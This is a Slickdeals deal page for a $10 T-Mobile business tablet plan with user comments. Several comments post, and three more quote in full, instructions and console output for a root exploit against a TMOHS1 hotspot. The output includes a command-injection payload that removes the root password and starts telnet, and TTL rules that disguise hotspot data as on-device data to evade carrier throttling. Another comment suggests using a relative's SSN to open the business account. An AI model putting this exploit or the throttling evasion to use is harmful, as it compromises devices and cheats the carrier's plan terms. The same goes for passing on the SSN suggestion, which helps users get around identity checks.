Slickdeals is community-supported.  We may get paid by brands for deals, including promoted items.
Heads up, this deal has expired. Want to create a deal alert for this item?
expired Posted by King_Chucky • Mar 16, 2022
expired Posted by King_Chucky • Mar 16, 2022

T-Mobile Business Tablet Plan: Unlimited Data + 10GB of Mobile Hotspot

(Valid In-Store only)

$10 per month

$10

T-Mobile
5,678 Comments 1,104,717 Views
Visit T-Mobile
Good Deal
Save
Share
Deal Details
T-Mobile (link is for reference only) is offering a T-Mobile Business Tablet Plan with Unlimited Data + 10GB of Mobile Hotspot for $10 per month. Valid in-store only [store locator].

Thanks to community member King_Chucky for sharing this deal

Note, The Unlimited tablet promo requires a business account with T-Mobile.

Plan Features:
  • Unlimited high-speed on-device 5G/LTE data (5G device required for 5G access), deprioritized after 50GB of usage
  • 10GB of mobile hotspot data, then unlimited mobile hotspot at 3G speeds (600 kbps) for the remainder of the month

Editor's Notes

Written by qwikwit | Staff
  • About this deal:
    • This deal does require verification of your business (example, an EIN number). Check with your local store to see what they require for verification.
    • See forum thread for deal discussion and ideas.

Original Post

Written by King_Chucky
Community Notes
About the Poster
Deal Details
Community Notes
About the Poster
T-Mobile (link is for reference only) is offering a T-Mobile Business Tablet Plan with Unlimited Data + 10GB of Mobile Hotspot for $10 per month. Valid in-store only [store locator].

Thanks to community member King_Chucky for sharing this deal

Note, The Unlimited tablet promo requires a business account with T-Mobile.

Plan Features:
  • Unlimited high-speed on-device 5G/LTE data (5G device required for 5G access), deprioritized after 50GB of usage
  • 10GB of mobile hotspot data, then unlimited mobile hotspot at 3G speeds (600 kbps) for the remainder of the month

Editor's Notes

Written by qwikwit | Staff
  • About this deal:
    • This deal does require verification of your business (example, an EIN number). Check with your local store to see what they require for verification.
    • See forum thread for deal discussion and ideas.

Original Post

Written by King_Chucky

Community Voting

Deal Score
+190
Good Deal
Visit T-Mobile

Leave a Comment

Unregistered (You)

Top Comments

Just an FYI if you're just getting this for the "free" tablet. The tablet is a Galaxy A7 lite which only costs $200 ($129 on Amazon)

They will still lock you to a 2 year EIP even if it's free (They'll make a monthly credit to cover the tablet EIP)

Meaning you'd end up paying $10 for 2 years ($240) for a $129 tablet.

So if you're only doing it for the tablet then it's not worth it
Some people don't live in a house.
Not on the "free" tablet, lol. In all seriousness, don't choose the plan with TE in the title as that one is tax exclusive (you have 2 choices)

soc code ZB10HSTI is the one you want.

5,677 Comments

Sign up for a Slickdeals account to remove this ad.

Apr 1, 2022
1,222 Posts
Joined Dec 2007
Apr 1, 2022
tran1981
Apr 1, 2022
1,222 Posts
Quote from MB W163 :
I just gave the SOC code seen in the wiki and the lady said she was going to input it… I was on hold for a couple minutes while she did what she needed to do. She said everything's good on her end. My speeds doubled afterwards on that fast.com test website.

I still need to verify if it shows up on my online account or somewhere in the settings.
What's your test.com test speed?
Apr 1, 2022
3,039 Posts
Joined Dec 2015
Apr 1, 2022
appleguy82
Apr 1, 2022
3,039 Posts
Quote from tran1981 :
What's your test.com test speed?

When the HD soc is added you see speeds around 7 to 8 Mb on fast.com without that when 480P the speed are like 2 to 3 Mb.
Apr 1, 2022
2,949 Posts
Joined Dec 2007
Apr 1, 2022
xoneinax
Apr 1, 2022
2,949 Posts
Quote from djdakine :
Been busy. Just walked into a corp store. Couldn't find the plan.
You already have a Business account with 10 lines and the store still cannot find how to add the ZB10HSTI line. I don't feel so bad from my yesterday's failure.
Apr 1, 2022
131 Posts
Joined Sep 2011
Apr 1, 2022
djdakine
Apr 1, 2022
131 Posts
Quote from xoneinax :
You already have a Business account with 10 lines and the store still cannot find how to add the ZB10HSTI line. I don't feel so bad from my yesterday's failure.

what happened yesterday?!? sorry I havent been following the thread much. Today was the first day I could spare an hour to run down to the store. But I just got off the phone with CS, and they found it. They couldn't verify me via PIN, so they notated my account, and I can go into a store to do it. Miss having a business REP ;/
Apr 1, 2022
6,855 Posts
Joined Dec 2007
Apr 1, 2022
ELofLA
Apr 1, 2022
6,855 Posts
Was anyone able to sign up online ? I'm already a regular T-Mobile customer .
Apr 1, 2022
2,949 Posts
Joined Dec 2007
Apr 1, 2022
xoneinax
Apr 1, 2022
2,949 Posts
Yeah, if you can get the business account application to stick.
Apr 1, 2022
1,222 Posts
Joined Dec 2007
Apr 1, 2022
tran1981
Apr 1, 2022
1,222 Posts
Quote from appleguy82 :
When the HD soc is added you see speeds around 7 to 8 Mb on fast.com without that when 480P the speed are like 2 to 3 Mb.
Cool. I'm getting that too after HD pass was added.

Sign up for a Slickdeals account to remove this ad.

Apr 2, 2022
2,284 Posts
Joined Apr 2006
Apr 2, 2022
hottie
Apr 2, 2022
2,284 Posts
Quote from ELofLA :
Was anyone able to sign up online ? I'm already a regular T-Mobile customer .

People had issues using the same SSN that is on consumer T-Mobile account. Try using someone in your family to open the business account
Apr 2, 2022
3 Posts
Joined Jan 2021
Apr 2, 2022
TealMustang668
Apr 2, 2022
3 Posts

Our community has rated this post as helpful. If you agree, why not thank TealMustang668

Quote from Jimwm :
I would like to make a correction. I have just discovered that the new TMOHS1 hotspot is also hackable:

https://github.com/parker-stephen...ot-Utility [github.com]

https://parkercs.tech/tmohs1/

I have not tested this method because I do not have the TMOHS1 hotspot. I see one advantage of this hacking is that it can mask "all outgoing data as "on-device" rather than hotspot data"
I have tested this after my hotspot speed throttled to 600kbps. Works like charm.

Windows Instructions
1. Open Powershell (Search Powershell).
2. type
Code:
python
to check installed or not (If its not installed, windows will open app store download it, once the download is completed type python to make sure its installed).
3. Download the zip file from https://github.com/parker-stephen...s/main.zip and unzip it.
4. go to unzipped location in powershell using cd.
5. install the requirements by executing command:
Code:
pip install -r requirements.txt
6. then run the bellow command follow the prompts.

example

Code:
C:\Users\\Downloads\TMOHS1-Root-Utility-main>python ./rootScript.py -v

Verbose mode enabled.

Enter your weblogin password:
Encrypting the login payload with key "abcdefghijklmn12" [yes, that's really the key]. . .
Sending the authentication request. . .
Received authentication token from hotspot: 876876876

Response: {'result': '0', 'ip': '0.0.0.0', 'timeout': '000300', 'token': '9879898'}
Exploiting qcmap_web_cgi. . .


Connection to device may reset. If you are running the exploit via WiFi,
ensure that your device reconnects to the hotspot's network.

Payload is ready: page=savepowersaving&displaytimeout=undefined&wifistandby=10;$(mount -o remount,rw /; telnetd; passwd -d root)&token=987987978
Sending the payload now!
Waiting for socket. . .
If you are running the exploit wirelessly, the connection may drop.
Remember to reconnect to your hotspot's WiFi once it reappears.
This may take up to a minute.

Connected! Socket says: {'commit': 'Socket TimeOut'}

Remounted root filesystem r/w. . .
Removed root password. . .
Enabling telnet. . .
Trying to connect via telnet. . .
Received:

mdm 987987987 mdm9607


mdm9607 login:
Telnet connection initialized.
Logging in as root with empty password, please wait. . .
Waiting for login to be processed. . .

The exploit removed the root password of your device. It is STRONGLY recommended to set a custom root password.
Your device will be EXTREMELY INSECURE if you do not.

Would you like to set a custom root password? (Y/n):
y

Changing root password.
IMPORTANT NOTE: the password will be sent insecurely over telnet,
 so you should manually change it later over ADB-USB if you are concerned about security.

Sent command via telnet: passwd root

Enter new password:
Confirm new password:
Root password successfully updated.
### Options ###
        1) Change root password
        2) Enough with this script BS, give me a shell!
        3) Enable ADB
        4) Enable ADB - Persistent through reboot (somewhat experimental)
        5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
        6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
        7) Enable mood lighting (look at the battery LED)
        8) Mask hotspot data as "on-device" data
        9) Reboot
        10) Quit

        Enter option: 8
Sent command via telnet: echo "iptables -t mangle -I POSTROUTING -o rmnet_data0 -j TTL --ttl-set 64" > /etc/init.d/ttl.sh; echo "ip6tables -t mangle -I POSTROUTING -o rmnet_data0 -j HL --hl-set 64" >> /etc/init.d/ttl.sh; chmod 755 /etc/init.d/ttl.sh; ln -s /etc/init.d/ttl.sh /etc/rc5.d/S98ttl

Added TTL rules to mask hotspot data as normal "on-device" data. Will take affect on reboot.
### Options ###
        1) Change root password
        2) Enough with this script BS, give me a shell!
        3) Enable ADB
        4) Enable ADB - Persistent through reboot (somewhat experimental)
        5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
        6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
        7) Enable mood lighting (look at the battery LED)
        8) Mask hotspot data as "on-device" data
        9) Reboot
        10) Quit

        Enter option: 9
Rebooting. Goodbye!
Sent command via telnet: reboot
Note: disable OMA-DM bootstrap by choosing the option 6


2
Apr 2, 2022
3 Posts
Joined Jan 2021
Apr 2, 2022
TealMustang668
Apr 2, 2022
3 Posts
Quote from oppayah :
Thanks! Is there a Youtube video of this hack? Tech dummy like me has no idea when clicking on the links you posted. lol
please check above my comment
Apr 2, 2022
98 Posts
Joined Dec 2015
Apr 2, 2022
LookingForNextDeal
Apr 2, 2022
98 Posts
Quote from CalmTent8970 :
Does it band 41? I lock to band 41 got around similar 4 up, band 66 gave me 20+ up
Not sure how to check which band the TMOHS1 is connected to and the web interface doesn't show it too.
Apr 2, 2022
2,546 Posts
Joined Jul 2005
Apr 2, 2022
accounted
Apr 2, 2022
2,546 Posts
Quote from TealMustang668 :
I have tested this after my hotspot speed throttled to 600kbps. Works like charm.

Windows Instructions
1. Open Powershell (Search Powershell).
2. type
Code:
python
to check installed or not (If its not installed, windows will open app store download it, once the download is completed type python to make sure its installed).
3. Download the zip file from https://github.com/parker-stephen...s/main.zip and unzip it.
4. go to unzipped location in powershell using cd.
5. install the requirements by executing command:
Code:
pip install -r requirements.txt
6. then run the bellow command follow the prompts.

example

Code:
C:\Users\\Downloads\TMOHS1-Root-Utility-main>python ./rootScript.py -v

Verbose mode enabled.

Enter your weblogin password:
Encrypting the login payload with key "abcdefghijklmn12" [yes, that's really the key]. . .
Sending the authentication request. . .
Received authentication token from hotspot: 876876876

Response: {'result': '0', 'ip': '0.0.0.0', 'timeout': '000300', 'token': '9879898'}
Exploiting qcmap_web_cgi. . .


Connection to device may reset. If you are running the exploit via WiFi,
ensure that your device reconnects to the hotspot's network.

Payload is ready: page=savepowersaving&displaytimeout=undefined&wifistandby=10;$(mount -o remount,rw /; telnetd; passwd -d root)&token=987987978
Sending the payload now!
Waiting for socket. . .
If you are running the exploit wirelessly, the connection may drop.
Remember to reconnect to your hotspot's WiFi once it reappears.
This may take up to a minute.

Connected! Socket says: {'commit': 'Socket TimeOut'}

Remounted root filesystem r/w. . .
Removed root password. . .
Enabling telnet. . .
Trying to connect via telnet. . .
Received:

mdm 987987987 mdm9607


mdm9607 login:
Telnet connection initialized.
Logging in as root with empty password, please wait. . .
Waiting for login to be processed. . .

The exploit removed the root password of your device. It is STRONGLY recommended to set a custom root password.
Your device will be EXTREMELY INSECURE if you do not.

Would you like to set a custom root password? (Y/n):
y

Changing root password.
IMPORTANT NOTE: the password will be sent insecurely over telnet,
 so you should manually change it later over ADB-USB if you are concerned about security.

Sent command via telnet: passwd root

Enter new password:
Confirm new password:
Root password successfully updated.
### Options ###
        1) Change root password
        2) Enough with this script BS, give me a shell!
        3) Enable ADB
        4) Enable ADB - Persistent through reboot (somewhat experimental)
        5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
        6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
        7) Enable mood lighting (look at the battery LED)
        8) Mask hotspot data as "on-device" data
        9) Reboot
        10) Quit

        Enter option: 8
Sent command via telnet: echo "iptables -t mangle -I POSTROUTING -o rmnet_data0 -j TTL --ttl-set 64" > /etc/init.d/ttl.sh; echo "ip6tables -t mangle -I POSTROUTING -o rmnet_data0 -j HL --hl-set 64" >> /etc/init.d/ttl.sh; chmod 755 /etc/init.d/ttl.sh; ln -s /etc/init.d/ttl.sh /etc/rc5.d/S98ttl

Added TTL rules to mask hotspot data as normal "on-device" data. Will take affect on reboot.
### Options ###
        1) Change root password
        2) Enough with this script BS, give me a shell!
        3) Enable ADB
        4) Enable ADB - Persistent through reboot (somewhat experimental)
        5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
        6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
        7) Enable mood lighting (look at the battery LED)
        8) Mask hotspot data as "on-device" data
        9) Reboot
        10) Quit

        Enter option: 9
Rebooting. Goodbye!
Sent command via telnet: reboot
Note: disable OMA-DM bootstrap by choosing the option 6
You are legend!
4+repped
Apr 2, 2022
1,222 Posts
Joined Dec 2007
Apr 2, 2022
tran1981
Apr 2, 2022
1,222 Posts
Quote from TealMustang668 :
I have tested this after my hotspot speed throttled to 600kbps. Works like charm.

Windows Instructions
1. Open Powershell (Search Powershell).
2. type
Code:
python
to check installed or not (If its not installed, windows will open app store download it, once the download is completed type python to make sure its installed).
3. Download the zip file from https://github.com/parker-stephen...s/main.zip and unzip it.
4. go to unzipped location in powershell using cd.
5. install the requirements by executing command:
Code:
pip install -r requirements.txt
6. then run the bellow command follow the prompts.

example

Code:
C:\Users\\Downloads\TMOHS1-Root-Utility-main>python ./rootScript.py -v

Verbose mode enabled.

Enter your weblogin password:
Encrypting the login payload with key "abcdefghijklmn12" [yes, that's really the key]. . .
Sending the authentication request. . .
Received authentication token from hotspot: 876876876

Response: {'result': '0', 'ip': '0.0.0.0', 'timeout': '000300', 'token': '9879898'}
Exploiting qcmap_web_cgi. . .


Connection to device may reset. If you are running the exploit via WiFi,
ensure that your device reconnects to the hotspot's network.

Payload is ready: page=savepowersaving&displaytimeout=undefined&wifistandby=10;$(mount -o remount,rw /; telnetd; passwd -d root)&token=987987978
Sending the payload now!
Waiting for socket. . .
If you are running the exploit wirelessly, the connection may drop.
Remember to reconnect to your hotspot's WiFi once it reappears.
This may take up to a minute.

Connected! Socket says: {'commit': 'Socket TimeOut'}

Remounted root filesystem r/w. . .
Removed root password. . .
Enabling telnet. . .
Trying to connect via telnet. . .
Received:

mdm 987987987 mdm9607


mdm9607 login:
Telnet connection initialized.
Logging in as root with empty password, please wait. . .
Waiting for login to be processed. . .

The exploit removed the root password of your device. It is STRONGLY recommended to set a custom root password.
Your device will be EXTREMELY INSECURE if you do not.

Would you like to set a custom root password? (Y/n):
y

Changing root password.
IMPORTANT NOTE: the password will be sent insecurely over telnet,
 so you should manually change it later over ADB-USB if you are concerned about security.

Sent command via telnet: passwd root

Enter new password:
Confirm new password:
Root password successfully updated.
### Options ###
        1) Change root password
        2) Enough with this script BS, give me a shell!
        3) Enable ADB
        4) Enable ADB - Persistent through reboot (somewhat experimental)
        5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
        6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
        7) Enable mood lighting (look at the battery LED)
        8) Mask hotspot data as "on-device" data
        9) Reboot
        10) Quit

        Enter option: 8
Sent command via telnet: echo "iptables -t mangle -I POSTROUTING -o rmnet_data0 -j TTL --ttl-set 64" > /etc/init.d/ttl.sh; echo "ip6tables -t mangle -I POSTROUTING -o rmnet_data0 -j HL --hl-set 64" >> /etc/init.d/ttl.sh; chmod 755 /etc/init.d/ttl.sh; ln -s /etc/init.d/ttl.sh /etc/rc5.d/S98ttl

Added TTL rules to mask hotspot data as normal "on-device" data. Will take affect on reboot.
### Options ###
        1) Change root password
        2) Enough with this script BS, give me a shell!
        3) Enable ADB
        4) Enable ADB - Persistent through reboot (somewhat experimental)
        5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
        6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
        7) Enable mood lighting (look at the battery LED)
        8) Mask hotspot data as "on-device" data
        9) Reboot
        10) Quit

        Enter option: 9
Rebooting. Goodbye!
Sent command via telnet: reboot
Note: disable OMA-DM bootstrap by choosing the option 6
Do you have similar for Franklin T9? I'm getting throttled at 5-600kbps.
Apr 2, 2022
392 Posts
Joined Jun 2006
Apr 2, 2022
MB W163
Apr 2, 2022
392 Posts
Quote from tran1981 :
What's your test.com test speed?

Fast.com hovers around 5.8-7.8 Mbps. Originally it was 2.3 without that HD code activation.

My Speedtest is around 300 Mbps down and 18 Mbps up

Sign up for a Slickdeals account to remove this ad.

Apr 2, 2022
523 Posts
Joined Apr 2014
Apr 2, 2022
Jimwm
Apr 2, 2022
523 Posts
Quote from TealMustang668 :
I have tested this after my hotspot speed throttled to 600kbps. Works like charm.

Windows Instructions
1. Open Powershell (Search Powershell).
2. type
Code:
python
to check installed or not (If its not installed, windows will open app store download it, once the download is completed type python to make sure its installed).
3. Download the zip file from https://github.com/parker-stephen...s/main.zip and unzip it.
4. go to unzipped location in powershell using cd.
5. install the requirements by executing command:
Code:
pip install -r requirements.txt
6. then run the bellow command follow the prompts.

example

Code:
C:\Users\\Downloads\TMOHS1-Root-Utility-main>python ./rootScript.py -v

Verbose mode enabled.

Enter your weblogin password:
Encrypting the login payload with key "abcdefghijklmn12" [yes, that's really the key]. . .
Sending the authentication request. . .
Received authentication token from hotspot: 876876876

Response: {'result': '0', 'ip': '0.0.0.0', 'timeout': '000300', 'token': '9879898'}
Exploiting qcmap_web_cgi. . .


Connection to device may reset. If you are running the exploit via WiFi,
ensure that your device reconnects to the hotspot's network.

Payload is ready: page=savepowersaving&displaytimeout=undefined&wifistandby=10;$(mount -o remount,rw /; telnetd; passwd -d root)&token=987987978
Sending the payload now!
Waiting for socket. . .
If you are running the exploit wirelessly, the connection may drop.
Remember to reconnect to your hotspot's WiFi once it reappears.
This may take up to a minute.

Connected! Socket says: {'commit': 'Socket TimeOut'}

Remounted root filesystem r/w. . .
Removed root password. . .
Enabling telnet. . .
Trying to connect via telnet. . .
Received:

mdm 987987987 mdm9607


mdm9607 login:
Telnet connection initialized.
Logging in as root with empty password, please wait. . .
Waiting for login to be processed. . .

The exploit removed the root password of your device. It is STRONGLY recommended to set a custom root password.
Your device will be EXTREMELY INSECURE if you do not.

Would you like to set a custom root password? (Y/n):
y

Changing root password.
IMPORTANT NOTE: the password will be sent insecurely over telnet,
 so you should manually change it later over ADB-USB if you are concerned about security.

Sent command via telnet: passwd root

Enter new password:
Confirm new password:
Root password successfully updated.
### Options ###
        1) Change root password
        2) Enough with this script BS, give me a shell!
        3) Enable ADB
        4) Enable ADB - Persistent through reboot (somewhat experimental)
        5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
        6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
        7) Enable mood lighting (look at the battery LED)
        8) Mask hotspot data as "on-device" data
        9) Reboot
        10) Quit

        Enter option: 8
Sent command via telnet: echo "iptables -t mangle -I POSTROUTING -o rmnet_data0 -j TTL --ttl-set 64" > /etc/init.d/ttl.sh; echo "ip6tables -t mangle -I POSTROUTING -o rmnet_data0 -j HL --hl-set 64" >> /etc/init.d/ttl.sh; chmod 755 /etc/init.d/ttl.sh; ln -s /etc/init.d/ttl.sh /etc/rc5.d/S98ttl

Added TTL rules to mask hotspot data as normal "on-device" data. Will take affect on reboot.
### Options ###
        1) Change root password
        2) Enough with this script BS, give me a shell!
        3) Enable ADB
        4) Enable ADB - Persistent through reboot (somewhat experimental)
        5) Enable FTP server for / on port 21 - DO NOT LEAVE OPEN
        6) Remove OMA-DM bootstrap (essentially disables firmware updates, recommended)
        7) Enable mood lighting (look at the battery LED)
        8) Mask hotspot data as "on-device" data
        9) Reboot
        10) Quit

        Enter option: 9
Rebooting. Goodbye!
Sent command via telnet: reboot
Note: disable OMA-DM bootstrap by choosing the option 6
Fantastic, thanks for your confirmation and sharing the steps.

Leave a Comment

Unregistered (You)

Related Searches

Popular Deals

View All

Trending Deals

View All